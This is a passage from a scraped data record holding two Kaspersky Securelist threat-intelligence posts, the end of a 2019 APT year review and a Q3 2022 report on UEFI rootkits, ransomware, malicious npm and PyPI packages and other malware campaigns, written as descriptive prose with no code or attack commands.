BlueNoroff keeps changing it to evade detection.\n\nAndariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.\n\nIn October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.\n\nThe Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our 'Unraveling the Lamberts Toolkit' report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette. The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific [NOBUS](<https://en.wikipedia.org/wiki/NOBUS>) and [OPSEC](<https://en.wikipedia.org/wiki/Operations_security>) concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low level file-wiping functionality. We observed victims of Silver Lambert in China, in the Aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows \u2013 including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.\n\nEarly in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator's flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor's TTPs during the last year, LuckyMouse hasn't changed any of them. The threat actor still relies on its own tools to get a foothold in the victim's network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.\n\nThe HoneyMyte APT has been active for several years. The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it's possible that the individual targets were related to geo-political activity in the region.\n\nThe Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following [our original report on Icefog in 2013](<https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/>), the group's operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China's Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor's lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detections. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.\n\n## Evolution of the 'newcomers'\n\nWe first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and \u2013 somewhat surprisingly \u2013 in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.\n\nIn April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.\n\nIn February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows \u2013 the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FrutiyArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.\n\nDuring February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. The low OPSEC and simplistic malware involved in this operation does not seem to point to an advanced threat actor.\n\nIn February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.\n\nIn Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.\n\n## Privacy matters\n\nOn January 17, security researcher Troy Hunt reported a [leak of more than 773 million email and 21 million unique password records](<https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/>). The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this 'new' leak. It turned out that Collection #1 was just part of a [larger dump of leaked credentials comprising 2.2 billion stolen account records](<https://threatpost.com/collection-1-data-dump-hacker-identified/141447/>). The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.\n\nIn February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, [were put up for sale on Dream Market](<https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/>), accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies [was posted](<https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/>) to the same market place. Then in March, the [hacker behind the earlier data dumps posted stolen data from a further six companies](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>).\n\nStolen credentials, along with other personal information harvested from data leaks, is valuable not only to cybercriminals but also to targeted attackers, including those wishing to [track the activities of dissidents and activists](<https://www.amnesty.org/en/latest/research/2019/03/phishing-attacks-using-third-party-applications-against-egyptian-civil-society-organizations/>) in various parts of the world.\n\nWe've become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such 'traditional' forms of authentication is bad enough, but the effects of using alternative methods of authentication can be much more serious. In August, [two Israeli researchers discovered](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>) fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.\n\nMoreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information \u2013 information that would prove very valuable to criminals and APT threat actors alike.\n\n## Final thoughts\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)", "cvss3": {}, "published": "2019-12-04T10:00:22", "type": "securelist", "title": "APT review: what the world\u2019s threat actors got up to in 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-0797"], "modified": "2019-12-04T10:00:22", "id": "SECURELIST:C7E3F6A27205B506CE8683317323C0BC", "href": "https://securelist.com/ksb-2019-review-of-the-year/95394/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-18T08:07:16", "description": "\n\n * **IT threat evolution in Q3 2022**\n * [IT threat evolution in Q3 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/>)\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n## Targeted attacks\n\n### CosmicStrand: discovery of a sophisticated UEFI rootkit\n\nIn July, we [reported a rootkit](<https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/>) that we found in modified [Unified Extensible Firmware Interface](<https://encyclopedia.kaspersky.com/glossary/uefi/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren&#x27;t easy to create: the slightest programming error could crash the machine. Nevertheless, in our [APT predictions for 2022](<https://securelist.com/advanced-threat-predictions-for-2022/104870/>), we noted that more attackers would reach the sophistication level required to develop such tools.\n\nThe main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers. Having successfully passed through all stages of the boot process, the rootkit eventually runs a shell code and contacts the attackers&#x27; C2 (Command-and-Control) server, from which it receives a malicious payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/07/20124904/CosmicStrand_UEFI_malware_01.png>)\n\nWe were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named &quot;aaaabbbb&quot; in the operating system with local administrator rights.\n\nWe identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it&#x27;s likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.\n\nIt&#x27;s also unclear how the attackers managed to deliver the malware. It&#x27;s possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.\n\n### Andariel deploys DTrack and Maui ransomware\n\nOn 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an [alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>) in which they accused North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, [we determined](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.\n\nAndariel&#x27;s primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. When the attackers find noteworthy data, the Maui ransomware is deployed \u2013 it is typically detected on targeted hosts 10 hours after the activation of DTrack.\n\nThe attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.\n\nTo infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.\n\nOur research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.\n\n### VileRAT: DeathStalker&#x27;s continuous strike at foreign and crypto-currency exchanges\n\nIn late August 2020, we published an [overview of DeathStalker](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the [PowerPepper](<https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/>) campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of [an evasive and highly intricate attack campaign](<https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/>) against foreign exchange and cryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.\n\nSince we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/05135347/VileRAT_DeathStalkers_continuous_strike_02.png>)\n\nThe threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses \u2013 the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.\n\nOn the other side, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates. For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.\n\nUsing only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 \u2013 in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.\n\nWe do not know what DeathStalker&#x27;s principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets&#x27; customers. However, it does not appear to be direct financial gain.\n\n### Kimsuky&#x27;s GoldDragon cluster and C2 operations\n\nKimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22113157/Kimsukys_GoldDragon_03.png>)\n\nThe attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it&#x27;s in the target list. The first-stage script also forwards the victim&#x27;s IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it&#x27;s an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22112947/Kimsukys_GoldDragon_01.png>)\n\nBased on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.\n\nOur [research](<https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/>) underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.\n\n### Targeted attacks on industrial enterprises\n\nIn August, Kaspersky ICS CERT experts reported [a wave of targeted attacks on military industrial complex enterprises and public institutions](<https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/?utm_source=securelist&utm_medium=link&utm_campaign=targeted-attack-on-industrial-enterprises-and-public-institutions>) in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments. We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.\n\nThe attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability, which enables an attacker to execute arbitrary code \u2013 in this case, the main module of the PortDoor backdoor \u2013 without any additional user action.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/03155648/APT_TA428_targeted_attack_01.png>)\n\nThe attackers used five different backdoors at the same time \u2013 probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries \u2013 these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.\n\n## Other malware\n\n### Prilex: the pricey prickle credit card complex\n\nPrilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. Since then the group has greatly improved its malware: it develops complex threats and poses a major threat to the payment chain. Prilex is now conducting so-called &quot;GHOST&quot; attacks \u2013 fraudulent transactions using cryptograms, which are pre-generated by the victim&#x27;s card during the store payment process.\n\nThe group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.\n\nPrior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers&#x27; server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/28092316/Prilex_ATM_and_PoS_report_10_1.png>)\n\nHaving attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.\n\nIn [our recent investigation](<https://securelist.com/prilex-atm-pos-malware-evolution/107551/>), we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion \u2013 used by professional development teams. Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the [dark web](<https://encyclopedia.kaspersky.com/glossary/dark-web/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), for example, in 2019 a German bank [lost more than \u20ac1.5 million](<https://www.zdnet.com/article/german-bank-loses-eur1-5-million-in-mysterious-cashout-of-emv-cards/>) in a similar attack by the Prilex malware. The development of its MasS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.\n\nWe also discovered web sites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these web sites, as they could be copycats.\n\n### Luna and Black Basta: new ransomware for Windows, Linux and ESXi\n\nRansomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year \u2013 the [BlackCat](<https://www.kaspersky.com/blog/black-cat-ransomware/44120/>) gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: [Black Basta and Luna](<https://securelist.com/luna-black-basta-ransomware/106950/>).\n\nBlack Basta, first discovered in February, exists in versions for Windows and for Linux \u2013 the latter primarily targeting ESXi virtual machine images. One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don&#x27;t work in Safe Mode.\n\nAt the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.\n\nLuna, discovered in June and also written in Rust, is able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.\n\n### Malicious packages in online code repositories\n\nIn July, we reported a malicious campaign that we named [LofyLife](<https://securelist.com/lofylife-malicious-npm-packages/107014/>). Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.\n\nThe identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The &quot;formatting headlines&quot; package was in Brazilian Portuguese with a &quot;#brazil&quot; hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.\n\nThe packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. The malicious payload consisted of malware written in Python dubbed Volt Stealer \u2013 an open-source malicious script \u2013 and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim&#x27;s IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim&#x27;s actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.\n\nThe npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. [This is not the first time we&#x27;ve seen an npm package poisoned in this way](<https://www.kaspersky.com/blog/uaparser-js-infected-versions/42700/>).\n\nnpm is not the only such code repository to have been targeted recently. In August, Check Point [published a report](<https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/>) on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers&#x27; personal data and credentials. Following this research, [we discovered two other malicious Python packages in the PyPI](<https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/>), masquerading as one of the most popular open-source packages named &quot;[requests](<https://pypi.org/project/requests/#files>)&quot;.\n\nThe attacker used a description of the legitimate &quot;requests&quot; package in order to trick victims into installing a malicious one. In addition, the description contained fake statistics and the project description referenced the web pages of the original &quot;requests&quot; package, as well as the author&#x27;s email. All mentions of the legitimate package&#x27;s name were replaced with the name of the malicious one.\n\n### Cyberthreats facing gamers\n\nThe gaming industry is huge and growing. The industry attracts [an audience of more than 3 billion people worldwide](<https://newzoo.com/insights/articles/games-market-engagement-revenues-trends-2020-2023-gaming-report>) \u2013 a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: [the promise of an Android version of a game that&#x27;s not on Google Play](<https://www.kaspersky.com/blog/fortnite-security/23685/>); [the chance to play games for free](<https://www.kaspersky.com/blog/free-smartphone-games/37303/>); access to game cheats; etc.\n\nWe recently published our [report on gaming-related threats](<https://securelist.com/gaming-related-cyberthreats-2021-2022/107346/>) in 2021\u201322. Here are some of the key headlines:\n\n * In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.\n * The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.\n * The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.\n * Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers&#x27; security. In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.\n * Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.\n\nAmong the top threats is RedLine, which we deemed worthy of a [separate report](<https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/>). The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.\n\nThe Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.\n\nRedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs \u2013 useful for cryptocurrency mining.\n\nIn addition to losing sensitive data, the player&#x27;s reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim&#x27;s YouTube channel \u2013 the same video that led the gamer to become infected. In this way, they become the means by which other gamers become infected.\n\n### NullMixer: oodles of Trojans in a single dropper\n\nTrying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise. In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.\n\nNullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host &quot;cracks&quot;, &quot;keygens&quot; and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23132345/NullMixer_report_01.png>)\n\nWhen someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine 